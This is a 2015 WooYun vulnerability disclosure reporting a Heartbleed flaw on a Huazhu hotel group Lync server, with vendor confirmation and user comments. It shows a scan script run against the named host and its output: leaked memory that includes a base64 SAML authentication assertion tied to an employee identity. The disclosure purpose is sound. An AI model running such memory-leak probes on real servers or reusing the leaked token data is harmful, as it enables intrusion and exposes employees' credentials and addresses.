当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090041

漏洞标题:华住某站心脏滴血导致大量员工邮箱地址信息泄露

相关厂商:汉庭酒店

漏洞作者: 杀器王子

提交时间:2015-01-05 12:42

修复时间:2015-02-19 12:44

公开时间:2015-02-19 12:44

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-05: 厂商已经确认,细节仅向厂商公开
2015-01-15: 细节向核心白帽子及相关领域专家公开
2015-01-25: 细节向普通白帽子公开
2015-02-04: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

简要描述:

滴呀滴

详细说明:

lync.huazhu.com心脏滴血

python OpenSSL.py         
input IP:lync.huazhu.com
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
 WARNING: server returned more data than it should - server is vulnerable!
@SC[r+H9w3f"!98532ED/AI42#0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4|j{!v0mxvYzo0NDQzL2I1YWFkNWRhLWIxN2QtNTc4MS05NjAwLTZlMTFhNzhiMGI2NCIgSXNzdWVJbnN0YW50PSIyMDE1LTAxLTA1VDAzOjE3OjUyLjEyN1oiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMDphc3NlcnRpb24iPjxzYW1sOkNvbmRpdGlvbnMgTm90QmVmb3JlPSIyMDE1LTAxLTA1VDAzOjE3OjUyLjEyNloiIE5vdE9uT3JBZnRlcj0iMjAxNS0wMS0wNVQxMTowNjoxMS4xMjZaIj48c2FtbDpBdWRpZW5jZVJlc3RyaWN0aW9uQ29uZGl0aW9uPjxzYW1sOkF1ZGllbmNlPmh0dHBzOi8vbHluYy5odWF6aHUuY29tLzwvc2FtbDpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbkNvbmRpdGlvbj48L3NhbWw6Q29uZGl0aW9ucz48c2FtbDpBdXRoZW50aWNhdGlvblN0YXRlbWVudCBBdXRoZW50aWNhdGlvbk1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6MS4wOmFtOnVuc3BlY2lmaWVkIiBBdXRoZW50aWNhdGlvbkluc3RhbnQ9IjIwMTUtMDEtMDVUMDM6MTc6NTIuMTI3WiI+PHNhbWw6U3ViamVjdD48c2FtbDpOYW1lSWRlbnRpZmllciBGb3JtYXQ9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDUvaWRlbnRpdHkvY2xhaW1zL3VyaSI+c2lwOnlvdWh1aXhAaHVhemh1LmNvbTwvc2FtbDpOYW1lSWRlbnRpZmllcj48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uPjxzYW1sOkNvbmZpcm1hdGlvbk1ldGhvZD51cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoxLjA6Y206aG9sZGVyLW9mLWtleTwvc2FtbDpDb25maXJtYXRpb25NZXRob2Q+PEtleUluZm8geG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxlOkVuY3J5cHRlZEtleSB4bWxuczplPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzA0L3htbGVuYyMiPjxlOkVuY3J5cHRpb25NZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzA0L3htbGVuYyNrdy1hZXMyNTYiPjwvZTpFbmNyeXB0aW9uTWV0aG9kPjxLZXlJbmZvPjxLZXlOYW1lPmI1YWFkNWRhLWIxN2QtNTc4MS05NjAwLTZlMTFhNzhiMGI2NDo4ZDFmNmE0MDVmNTQxOGU8L0tleU5hbWU+PC9LZXlJbmZvPjxlOkNpcGhlckRhdGE+PGU6Q2lwaGVyVmFsdWU+V0I5akcvRTBvOTJueEFKM1NndnRhd001QzNHT3laRm5NcWxwK1lvK3R2TGV5ZHlpOXU2bkx3PT08L2U6Q2lwaGVyVmFsdWU+PC9lOkNpcGhlckRhdGE+PC9lOkVuY3J5cHRlZEtleT48L0tleUluZm8+PC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24+PC9zYW1sOlN1YmplY3Q+PC9zYW1sOkF1dGhlbnRpY2F0aW9uU3RhdGVtZW50PjxTaWduYXR1cmUgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxTaWduZWRJbmZvPjxDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIj48L0Nhbm9uaWNhbGl6YXRpb25NZXRob2Q+PFNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSI+PC9TaWduYXR1cmVNZXRob2Q+PFJlZmVyZW5jZSBVUkk9IiNTYW1sU2VjdXJpdHlUb2tlbi0yMDFiY2E4Ny0wNDFhLTRkNDYtYTkxZS03ODRjOGNhMGYxMzUiPjxUcmFuc2Zvcm1zPjxUcmFuc2Zvcm0gQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjZW52ZWxvcGVkLXNpZ25hdHVyZSI+PC9UcmFuc2Zvcm0+PFRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyI+PC9UcmFuc2Zvcm0+PC9UcmFuc2Zvcm1zPjxEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzA0L3htbGVuYyNzaGEyNTYiPjwvRGlnZXN0TWV0aG9kPjxEaWdlc3RWYWx1ZT53bk9wbXV6bVpZeHhWaUFrYmFYTzNZakpxMFc5bzFCRCs5YnpxR0NMNEpvPTwvRGlnZXN0VmFsdWU+PC9SZWZlcmVuY2U+PC9TaWduZWRJbmZvPjxTaWduYXR1cmVWYWx1ZT5UczBVbWFSTG9FaHZVVUZ5eEtWRHVLdytUMXM5SzVZNnVSNmNNdjhxaXlBWnVGbUliR1hXNDY4M0g2V3lGR2pFbXhVb0tmdm1UT1hzbG8wcVpUWXc0MEFTczltUG5UbXdOZDBwZ3c3S1c5Z1gxSFVuOHJnSkJYRnhhak4yNm1rMk1SODV3eEgrVWRIT1Z2YUwvWktoUThNVHlwZGtDV0h4QmZDZmlPbC9xZjhEU3dOMHhVYldkVTdsbUxKQUNuUE94YUw1OHpqYzFCODkya3lVWlQrazkwOG9zb3RSZ3BPQVkvTTZCZGJXY3pHcmltTWRRbjc5cjgzQTN6VHhHcU91YWtyZmgxblJoeDFJQkJ0cTFWU0hvZkMyL3MrVjJ1dnlwbTRTbm9JbnpBOGhxMWtjaEFEZ0dSNFgwL2N5UWtrQTh0MmhlZ252bDRnZTBC


漏洞证明:

大量内部员工邮箱地址泄露

huazhu.jpg

修复方案:

打补丁

版权声明:转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-05 16:04

厂商回复:

谢谢关注,该问题己移交相关团队处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-05 12:44 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    前排!

  2. 2015-01-05 12:58 | 苏州同程旅游网络科技有限公司(乌云厂商)

    哥,那1K京东礼品卡你收到了吗。ok的话,麻烦去留个言说收到了吧,行政妹子要确认白帽子都收到了 WooYun: 同程旅游某服务配置不当getshell入内网并泄露内网结构

  3. 2015-01-05 13:10 | 姿势不行 ( 路人 | Rank:22 漏洞数:7 | 我是爱卖萌的小阿狸呀http://www.qinqinyo....)

    @苏州同程旅游网络科技有限公司 良心企业呀这是

  4. 2015-01-05 13:27 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    地球人已经阻止不了杀器王子了

  5. 2015-01-05 13:32 | 鬼色[N.S.T] ( 普通白帽子 | Rank:130 漏洞数:18 | 雷州半岛)

    滴呀滴到什么时候啊,当初我把华住的数据库账号密码都直接读出来了…… 想起来还没拿到礼品。

  6. 2015-01-05 14:12 | 杀器王子 认证白帽子 ( 普通白帽子 | Rank:1532 漏洞数:121 | 磨刀霍霍向猪羊)

    @鬼色[N.S.T] 为啥要礼品呢 给就给 不给拉倒 赚wb换肾6

  7. 2015-01-05 15:24 | CodeMan ( 路人 | Rank:6 漏洞数:5 | 湖北荆州公安的)

    @苏州同程旅游网络科技有限公司 妹子好萌